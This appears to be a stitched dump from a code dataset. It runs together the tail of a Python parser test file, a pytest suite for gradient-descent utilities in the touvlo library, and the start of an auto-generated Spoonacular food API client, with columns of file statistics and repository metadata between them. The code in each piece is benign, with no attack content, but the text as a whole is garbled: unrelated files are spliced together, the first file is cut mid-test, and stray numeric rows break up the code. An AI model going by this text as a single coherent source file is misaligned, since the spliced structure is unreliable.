tree = parser.run("x = 3")
self.assertEqual(tree.op, Token(lexems.ASSIGNMENT, lexems.ASSIGNMENT))
self.assertEqual(tree.right.val, Token(lexems.DIGIT, 3.0))
self.assertEqual(tree.left.val, Token(lexems.LETTER, 'x'))
def test_assignment_complex(self):
parser = Parser()
tree = parser.run("x = y = 3")
self.assertEqual(tree.op, Token(lexems.ASSIGNMENT, lexems.ASSIGNMENT))
self.assertEqual(tree.right.op, Token(lexems.ASSIGNMENT, lexems.ASSIGNMENT))
self.assertEqual(tree.left.val, Token(lexems.LETTER, 'x'))
def test_bad_fn_def(self):
parser = Parser()
tree = parser.run("fn avg => (x + y) / 2")
self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
def test_fn_def(self):
parser = Parser()
tree = parser.run("fn avg x y => (x + y) / 2")
self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
self.assertEqual(Token(lexems.DIVIDE, lexems.DIVIDE), tree.definition.op)
def test_fn_def_add(self):
parser = Parser()
tree = parser.run("fn add x y => x + z")
self.assertEqual(Token(lexems.LETTER, "add"), tree.name)
self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
self.assertEqual(Token(lexems.PLUS, lexems.PLUS), tree.definition.op)
def test_fn_def_echo(self):
parser = Parser()
tree = parser.run("fn echo x => x")
self.assertEqual(Token(lexems.LETTER, "echo"), tree.name)
self.assertEqual([Token(lexems.LETTER, "x")],tree.arguments)
self.assertEqual(Token(lexems.LETTER, "x"), tree.definition.val)
def test_fn_def_call(self):
parser = Parser()
tree = parser.run("fn avg x y => (x + y) / 2")
self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
self.assertEqual(Token(lexems.DIVIDE, lexems.DIVIDE), tree.definition.op)
tree = parser.run("avg 1 2")
self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
self.assertEqual(Token(lexems.DIGIT, 1.0), tree.arguments[0].val)
self.assertEqual(Token(lexems.DIGIT, 2.0), tree.arguments[1].val)
def test_fn_def_add_call(self):
parser = Parser()
tree = parser.run("fn add x y => x + z")
self.assertEqual(Token(lexems.LETTER, "add"), tree.name)
self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
self.assertEqual(Token(lexems.PLUS, lexems.PLUS), tree.definition.op)
tree = parser.run("add x+1 y")
self.assertEqual(Token(lexems.LETTER, "add"), tree.name)
self.assertEqual(Token(lexems.PLUS, lexems.PLUS), tree.arguments[0].op)
self.assertEqual(Token(lexems.LETTER, "y"), tree.arguments[1].val)
def test_fn_def_echo_call_no_def(self):
parser = Parser()
tree = parser.run("fn echo x => x")
self.assertEqual(Token(lexems.LETTER, "echo"), tree.name)
self.assertEqual([Token(lexems.LETTER, "x")],tree.arguments)
self.assertEqual(Token(lexems.LETTER, "x"), tree.definition.val)
with self.assertRaises(Exception) as context:
tree = parser.run("echo1 11")
def test_fn_def_echo_call_no_args(self):
parser = Parser()
tree = parser.run("fn echo => 2")
self.assertEqual(Token(lexems.LETTER, "echo"), tree.name)
| 43.228571
| 96
| 0.636043
| 606
| 4,539
| 4.70297
| 0.092409
| 0.165965
| 0.182456
| 0.237193
| 0.883158
| 0.856491
| 0.840702
| 0.8
| 0.694035
| 0.680351
| 0
| 0.010036
| 0.209738
| 4,539
| 105
| 97
| 43.228571
| 0.7845
| 0
| 0
| 0.54023
| 0
| 0
| 0.057269
| 0
| 0
| 0
| 0
| 0
| 0.45977
| 1
| 0.149425
| false
| 0
| 0.045977
| 0
| 0.206897
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40294d367a38c973cd2136fc0230c7b2b97479e3
| 12,934
|
py
|
Python
|
tests/test_utils.py
|
fossabot/touvlo
|
5eb65e11826e9519cb938a517c432701e7ce5ae9
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
fossabot/touvlo
|
5eb65e11826e9519cb938a517c432701e7ce5ae9
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
fossabot/touvlo
|
5eb65e11826e9519cb938a517c432701e7ce5ae9
|
[
"MIT"
] | null | null | null |
from math import radians
import pytest
from numpy import array, cos, sin, exp
from numpy.testing import assert_allclose
from touvlo.utils import (numerical_grad, g_grad, BGD, SGD, MBGD)
class TestLogisticRegression:
@pytest.fixture(scope="module")
def err(self):
return 0.0001
def test_numeric_grad_1(self, err):
def J(x):
return sum(3 * (x ** 2))
theta = array([[0], [4], [10]])
assert_allclose(array([[0], [24], [60]]),
numerical_grad(J, theta, err),
rtol=0, atol=0.001, equal_nan=False)
def test_numeric_grad_2(self, err):
def J(x):
return sum(1 / x)
theta = array([[5], [8], [20]])
assert_allclose(array([[-0.04], [-0.015625], [-0.0025]]),
numerical_grad(J, theta, err),
rtol=0, atol=0.001, equal_nan=False)
def test_numeric_grad_3(self, err):
def J(x):
return sum(cos(x))
theta = array([[radians(30)],
[radians(45)],
[radians(60)],
[radians(90)]])
assert_allclose(array([[-sin(radians(30))],
[-sin(radians(45))],
[-sin(radians(60))],
[-sin(radians(90))]]),
numerical_grad(J, theta, err),
rtol=0, atol=0.001, equal_nan=False)
def test_numeric_grad_4(self, err):
def J(x):
return sum(exp(x))
theta = array([[-10], [-1], [0], [1], [10]])
assert_allclose(array([[exp(-10)],
[exp(-1)],
[exp(0)],
[exp(1)],
[exp(10)]]),
numerical_grad(J, theta, err),
rtol=0, atol=0.001, equal_nan=False)
def test_numeric_grad_5(self, err):
def J(x):
return sum(7 * x)
theta = array([[-10], [-1], [0], [1], [10]])
assert_allclose(array([[7],
[7],
[7],
[7],
[7]]),
numerical_grad(J, theta, err),
rtol=0, atol=0.001, equal_nan=False)
def test_sigmoid_gradient(self):
z = array([-1, -0.5, 0, 0.5, 1])
assert_allclose(g_grad(z),
[0.196612, 0.235004, 0.25, 0.235004, 0.196612],
rtol=0, atol=0.001, equal_nan=False)
def test_BGD1(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0], [0], [0]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 3
alpha = 1
assert_allclose(array([[-46.415], [276.248], [192.204]]),
BGD(X, y, grad, initial_theta,
alpha, num_iters),
rtol=0, atol=0.001, equal_nan=False)
def test_BGD2(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0.3], [2.7], [1.6]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 4
alpha = 0.001
assert_allclose(array([[0.31748], [2.58283], [1.51720]]),
BGD(X, y, grad, initial_theta,
alpha, num_iters),
rtol=0, atol=0.001, equal_nan=False)
def test_BGD3(self, err):
def grad(X, y, theta, schleem, plumbus, wubba, lubba):
m = len(y)
grad = (schleem / (m * wubba))
grad = grad * (X.T).dot(X.dot(theta) - y)
grad = grad + plumbus / (2 * lubba)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0], [0], [0]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 5
plumbus = 0.8
schleem = 0.6
wubba = 3.4
lubba = 2.7
alpha = 0.01
assert_allclose(array([[-0.0078777], [0.0106179], [0.0060865]]),
BGD(X, y, grad, initial_theta,
alpha, num_iters, lubba=lubba,
schleem=schleem, wubba=wubba,
plumbus=plumbus),
rtol=0, atol=0.001, equal_nan=False)
def test_SGD1(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0], [0], [0]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 1
alpha = 1
assert_allclose(array([[6.1000], [-10.2000], [-3.7000]]),
SGD(X, y, grad, initial_theta,
alpha, num_iters),
rtol=0, atol=0.001, equal_nan=False)
def test_SGD2(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0], [0], [0]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 10
alpha = 0.01
assert_allclose(array([[0.042237], [0.162748], [0.133705]]),
SGD(X, y, grad, initial_theta,
alpha, num_iters),
rtol=0, atol=0.001, equal_nan=False)
def test_SGD3(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0.3], [2.7], [1.6]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 5
alpha = 0.001
assert_allclose(array([[0.36143], [2.28673], [1.30772]]),
SGD(X, y, grad, initial_theta,
alpha, num_iters),
rtol=0, atol=0.001, equal_nan=False)
def test_SGD4(self, err):
def grad(X, y, theta, schleem, plumbus, wubba, lubba):
m = len(y)
grad = (schleem / (m * wubba))
grad = grad * (X.T).dot(X.dot(theta) - y)
grad = grad + plumbus / (2 * lubba)
return grad
X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
initial_theta = array([[0.3], [2.7], [1.6]])
y = array([[0.3], [1.2], [0.5]])
num_iters = 8
plumbus = 1.2
schleem = 0.9
wubba = 2.4
lubba = 3
alpha = 0.005
assert_allclose(array([[0.42789], [1.63920], [0.84140]]),
SGD(X, y, grad, initial_theta,
alpha, num_iters, lubba=lubba,
schleem=schleem, wubba=wubba,
plumbus=plumbus),
rtol=0, atol=0.001, equal_nan=False)
def test_MBGD1(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
[2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
[2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
initial_theta = array([[0], [0], [0]])
y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
[-0.75], [0.43], [0.62], [0.85], [-0.3]])
num_iters = 1
alpha = 0.1
b = 3
assert_allclose(array([[-18.314], [-15.212], [-14.151]]),
MBGD(X, y, grad, initial_theta,
alpha, num_iters, b),
rtol=0, atol=0.001, equal_nan=False)
def test_MBGD2(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
[2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
[2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
initial_theta = array([[3], [-2], [0.7]])
y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
[-0.75], [0.43], [0.62], [0.85], [-0.3]])
num_iters = 1
alpha = 0.05
b = 3
assert_allclose(array([[-2.9970], [-5.3434], [-3.5491]]),
MBGD(X, y, grad, initial_theta,
alpha, num_iters, b),
rtol=0, atol=0.001, equal_nan=False)
def test_MBGD3(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
[2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
[2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
initial_theta = array([[3], [-2], [0.7]])
y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
[-0.75], [0.43], [0.62], [0.85], [-0.3]])
num_iters = 3
alpha = 0.05
b = 4
assert_allclose(array([[-4.6898], [-4.1763], [-6.0834]]),
MBGD(X, y, grad, initial_theta,
alpha, num_iters, b),
rtol=0, atol=0.001, equal_nan=False)
def test_MBGD4(self, err):
def grad(X, y, theta):
m = len(y)
grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
return grad
X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
[2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
[2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
initial_theta = array([[3], [-2], [0.7]])
y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
[-0.75], [0.43], [0.62], [0.85], [-0.3]])
num_iters = 1
alpha = 0.05
b = 5
assert_allclose(array([[0.67576], [-2.01056], [-0.80705]]),
MBGD(X, y, grad, initial_theta,
alpha, num_iters, b),
rtol=0, atol=0.001, equal_nan=False)
def test_MBGD5(self, err):
def grad(X, y, theta, schleem, plumbus, wubba, lubba):
m = len(y)
grad = (schleem / (m * wubba))
grad = grad * (X.T).dot(X.dot(theta) - y)
grad = grad + plumbus / (2 * lubba)
return grad
X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
[2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
[2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
initial_theta = array([[3], [-2], [0.7]])
y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
[-0.75], [0.43], [0.62], [0.85], [-0.3]])
num_iters = 1
plumbus = 1.2
schleem = 0.9
wubba = 2.4
lubba = 3
alpha = 0.05
b = 5
assert_allclose(array([[2.27894], [-1.54560], [0.30656]]),
MBGD(X, y, grad, initial_theta,
alpha, num_iters, b, lubba=lubba,
schleem=schleem, wubba=wubba,
plumbus=plumbus),
rtol=0, atol=0.001, equal_nan=False)
def test_MBGD6(self, err):
def grad(X, y, theta, schleem, plumbus, wubba, lubba):
m = len(y)
grad = (schleem / (m * wubba))
grad = grad * (X.T).dot(X.dot(theta) - y)
grad = grad + plumbus / (2 * lubba)
return grad
X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
[2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
[2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
initial_theta = array([[3], [-2], [0.7]])
y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
[-0.75], [0.43], [0.62], [0.85], [-0.3]])
num_iters = 5
plumbus = 1.2
schleem = 0.9
wubba = 2.4
lubba = 3
alpha = 0.1
b = 5
assert_allclose(array([[-0.0062510], [-0.3414393], [-0.3127686]]),
MBGD(X, y, grad, initial_theta,
alpha, num_iters, b, lubba=lubba,
schleem=schleem, wubba=wubba,
plumbus=plumbus),
rtol=0, atol=0.001, equal_nan=False)
| 35.729282
| 76
| 0.394773
| 1,791
| 12,934
| 2.778894
| 0.082635
| 0.053044
| 0.034358
| 0.038176
| 0.811935
| 0.791642
| 0.78702
| 0.743018
| 0.734378
| 0.733173
| 0
| 0.146139
| 0.414334
| 12,934
| 361
| 77
| 35.828255
| 0.510891
| 0
| 0
| 0.744186
| 0
| 0
| 0.000464
| 0
| 0
| 0
| 0
| 0
| 0.066445
| 1
| 0.126246
| false
| 0
| 0.016611
| 0.019934
| 0.209302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4029bb53471c97a4e61ffb5bcb20e1ae2fbe1e9a
| 446,837
|
py
|
Python
|
python/spoonacular/com/spoonacular/default_api.py
|
FPU-Spring-2021-CEN4010/spoonacular-api-clients
|
5becc86987c1b0406ed05d02f5c158fba284aa9c
|
[
"MIT"
] | null | null | null |
python/spoonacular/com/spoonacular/default_api.py
|
FPU-Spring-2021-CEN4010/spoonacular-api-clients
|
5becc86987c1b0406ed05d02f5c158fba284aa9c
|
[
"MIT"
] | null | null | null |
python/spoonacular/com/spoonacular/default_api.py
|
FPU-Spring-2021-CEN4010/spoonacular-api-clients
|
5becc86987c1b0406ed05d02f5c158fba284aa9c
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
spoonacular API
The spoonacular Nutrition, Recipe, and Food API allows you to access over 380,000 recipes, thousands of ingredients, 80,000 food products, and 100,000 menu items. Our food ontology and semantic recipe search engine makes it possible to search for recipes using natural language queries, such as \"gluten free brownies without sugar\" or \"low fat vegan cupcakes.\" You can automatically calculate the nutritional information for any recipe, analyze recipe costs, visualize ingredient lists, find recipes for what's in your fridge, find recipes based on special diets, nutritional requirements, or favorite ingredients, classify recipes into types and cuisines, convert ingredient amounts, or even compute an entire meal plan. With our powerful API, you can create many kinds of food and especially nutrition apps. Special diets/dietary requirements currently available include: vegan, vegetarian, pescetarian, gluten free, grain free, dairy free, high protein, whole 30, low sodium, low carb, Paleo, ketogenic, FODMAP, and Primal. # noqa: E501
The version of the OpenAPI document: 1.0
Contact: david@spoonacular.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from spoonacular.api_client import ApiClient
from spoonacular.exceptions import (
ApiTypeError,
ApiValueError
)
class DefaultApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_to_meal_plan(self, username, hash, inline_object11, **kwargs): # noqa: E501
"""Add to Meal Plan # noqa: E501
Add an item to the user's meal plan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_to_meal_plan(username, hash, inline_object11, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject11 inline_object11: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_to_meal_plan_with_http_info(username, hash, inline_object11, **kwargs) # noqa: E501
else:
(data) = self.add_to_meal_plan_with_http_info(username, hash, inline_object11, **kwargs) # noqa: E501
return data
def add_to_meal_plan_with_http_info(self, username, hash, inline_object11, **kwargs): # noqa: E501
"""Add to Meal Plan # noqa: E501
Add an item to the user's meal plan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_to_meal_plan_with_http_info(username, hash, inline_object11, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject11 inline_object11: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'hash', 'inline_object11'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_to_meal_plan" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `add_to_meal_plan`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `add_to_meal_plan`") # noqa: E501
# verify the required parameter 'inline_object11' is set
if ('inline_object11' not in local_var_params or
local_var_params['inline_object11'] is None):
raise ApiValueError("Missing the required parameter `inline_object11` when calling `add_to_meal_plan`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object11' in local_var_params:
body_params = local_var_params['inline_object11']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/items', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def add_to_shopping_list(self, username, hash, inline_object14, **kwargs): # noqa: E501
"""Add to Shopping List # noqa: E501
Add an item to the current shopping list of a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_to_shopping_list(username, hash, inline_object14, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject14 inline_object14: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_to_shopping_list_with_http_info(username, hash, inline_object14, **kwargs) # noqa: E501
else:
(data) = self.add_to_shopping_list_with_http_info(username, hash, inline_object14, **kwargs) # noqa: E501
return data
def add_to_shopping_list_with_http_info(self, username, hash, inline_object14, **kwargs): # noqa: E501
"""Add to Shopping List # noqa: E501
Add an item to the current shopping list of a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_to_shopping_list_with_http_info(username, hash, inline_object14, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:param InlineObject14 inline_object14: (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'hash', 'inline_object14'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_to_shopping_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `add_to_shopping_list`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `add_to_shopping_list`") # noqa: E501
# verify the required parameter 'inline_object14' is set
if ('inline_object14' not in local_var_params or
local_var_params['inline_object14'] is None):
raise ApiValueError("Missing the required parameter `inline_object14` when calling `add_to_shopping_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object14' in local_var_params:
body_params = local_var_params['inline_object14']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/shopping-list/items', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def analyze_a_recipe_search_query(self, q, **kwargs): # noqa: E501
"""Analyze a Recipe Search Query # noqa: E501
Parse a recipe search query to find out its intention. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.analyze_a_recipe_search_query(q, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str q: The recipe search query. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.analyze_a_recipe_search_query_with_http_info(q, **kwargs) # noqa: E501
else:
(data) = self.analyze_a_recipe_search_query_with_http_info(q, **kwargs) # noqa: E501
return data
def analyze_a_recipe_search_query_with_http_info(self, q, **kwargs): # noqa: E501
"""Analyze a Recipe Search Query # noqa: E501
Parse a recipe search query to find out its intention. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.analyze_a_recipe_search_query_with_http_info(q, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str q: The recipe search query. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method analyze_a_recipe_search_query" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'q' is set
if ('q' not in local_var_params or
local_var_params['q'] is None):
raise ApiValueError("Missing the required parameter `q` when calling `analyze_a_recipe_search_query`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'q' in local_var_params:
query_params.append(('q', local_var_params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/queries/analyze', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def analyze_recipe_instructions(self, instructions, **kwargs): # noqa: E501
"""Analyze Recipe Instructions # noqa: E501
This endpoint allows you to break down instructions into atomic steps. Furthermore, each step will contain the ingredients and equipment required. Additionally, all ingredients and equipment from the recipe's instructions will be extracted independently of the step they're used in. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.analyze_recipe_instructions(instructions, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instructions: The instructions to be analyzed. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.analyze_recipe_instructions_with_http_info(instructions, **kwargs) # noqa: E501
else:
(data) = self.analyze_recipe_instructions_with_http_info(instructions, **kwargs) # noqa: E501
return data
def analyze_recipe_instructions_with_http_info(self, instructions, **kwargs): # noqa: E501
"""Analyze Recipe Instructions # noqa: E501
This endpoint allows you to break down instructions into atomic steps. Furthermore, each step will contain the ingredients and equipment required. Additionally, all ingredients and equipment from the recipe's instructions will be extracted independently of the step they're used in. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.analyze_recipe_instructions_with_http_info(instructions, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instructions: The instructions to be analyzed. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['instructions'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method analyze_recipe_instructions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'instructions' is set
if ('instructions' not in local_var_params or
local_var_params['instructions'] is None):
raise ApiValueError("Missing the required parameter `instructions` when calling `analyze_recipe_instructions`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'instructions' in local_var_params:
form_params.append(('instructions', local_var_params['instructions'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/analyzeInstructions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
